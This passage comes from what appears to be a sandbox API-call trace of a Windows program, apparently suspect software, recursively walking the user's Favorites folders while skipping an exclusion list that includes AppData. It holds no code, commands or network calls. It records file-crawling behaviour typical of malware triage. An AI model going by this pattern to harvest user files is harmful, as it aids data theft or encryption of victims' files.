ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0x10, dwReserved1=0x657690, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 1 [0074.210] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.210] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.210] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.210] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.210] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.210] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.210] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x11c0068, ftCreationTime.dwLowDateTime=0xc2f70, ftCreationTime.dwHighDateTime=0x63f910, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x1317ae, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x1220069, nFileSizeHigh=0xc2f70, nFileSizeLow=0x2b, dwReserved0=0x650000, dwReserved1=0x657690, cFileName="a\x08", cAlternateFileName="?haဓ\x03\x10")) returned 0 [0074.210] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.210] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.214] FindClose (in: hFindFile=0x6b8af8 | out: hFindFile=0x6b8af8) returned 1 [0074.216] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.216] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.216] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.216] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.216] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x657494, dwReserved1=0x657690, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0074.216] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.216] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.216] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.216] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0074.216] PeekMessageW (in: lpMsg=0x61e4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e4d4) returned 0 [0074.216] PeekMessageW (in: lpMsg=0x61e4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e4d4) returned 0 [0074.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSN Websites", cchCount1=12, lpString2="AppData", cchCount2=7) returned 3 [0074.216] PeekMessageW (in: lpMsg=0x61e4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e4d4) returned 0 [0074.216] PeekMessageW (in: lpMsg=0x61e4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e4d4) returned 0 [0074.216] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.216] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0074.217] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.217] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*", lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName=".", cAlternateFileName="")) returned 0x6b8af8 [0074.451] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="..", cAlternateFileName="")) returned 1 [0074.452] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0074.452] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.452] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.452] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.452] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.452] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.452] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.452] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.452] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.452] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.452] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x10, dwReserved1=0x657690, cFileName="MSN Entertainment.url", cAlternateFileName="MSNENT~1.URL")) returned 1 [0074.452] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.452] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.452] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.452] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.452] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.452] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.452] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x10, dwReserved1=0x657690, cFileName="MSN Money.url", cAlternateFileName="MSNMON~1.URL")) returned 1 [0074.452] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.452] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.452] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.452] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.453] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.453] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.453] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x10, dwReserved1=0x657690, cFileName="MSN Sports.url", cAlternateFileName="MSNSPO~1.URL")) returned 1 [0074.453] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.453] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.453] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.453] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.453] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.453] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.453] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x10, dwReserved1=0x657690, cFileName="MSN.url", cAlternateFileName="")) returned 1 [0074.453] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.453] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.453] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.453] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.453] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.453] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.453] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x10, dwReserved1=0x657690, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 1 [0074.453] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.453] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.453] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.453] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.453] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.453] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.453] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x11c0068, ftCreationTime.dwLowDateTime=0xc2ffa, ftCreationTime.dwHighDateTime=0x63f910, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x1317ae, ftLastWriteTime.dwLowDateTime=0x13, ftLastWriteTime.dwHighDateTime=0x1120069, nFileSizeHigh=0xc2ffa, nFileSizeLow=0x6b9ac8, dwReserved0=0x10, dwReserved1=0x657690, cFileName="MS\x08", cAlternateFileName="?haဓ\x03\x10")) returned 0 [0074.453] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.454] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.454] FindClose (in: hFindFile=0x6b8af8 | out: hFindFile=0x6b8af8) returned 1 [0074.454] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.454] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.454] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.454] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.455] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x657494, dwReserved1=0x657690, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0074.455] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.455] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.455] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.455] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0074.455] PeekMessageW (in: lpMsg=0x61e4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e4d4) returned 0 [0074.455] PeekMessageW (in: lpMsg=0x61e4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e4d4) returned 0 [0074.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Windows Live", cchCount1=12, lpString2="AppData", cchCount2=7) returned 3 [0074.455] PeekMessageW (in: lpMsg=0x61e4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e4d4) returned 0 [0074.455] PeekMessageW (in: lpMsg=0x61e4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e4d4) returned 0 [0074.455] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.455] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0074.455] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.455] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*", lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName=".", cAlternateFileName="")) returned 0x6b8af8 [0074.465] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="..", cAlternateFileName="")) returned 1 [0074.465] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="Get Windows Live.url", cAlternateFileName="GETWIN~1.URL")) returned 1 [0074.465] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.465] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.465] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.465] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.465] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.465] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.465] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.465] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.465] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.465] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x10, dwReserved1=0x657690, cFileName="Windows Live Gallery.url", cAlternateFileName="WINDOW~2.URL")) returned 1 [0074.465] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.465] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.465] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.465] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.465] PeekMessageW (in: lpMsg=0x61e69c, 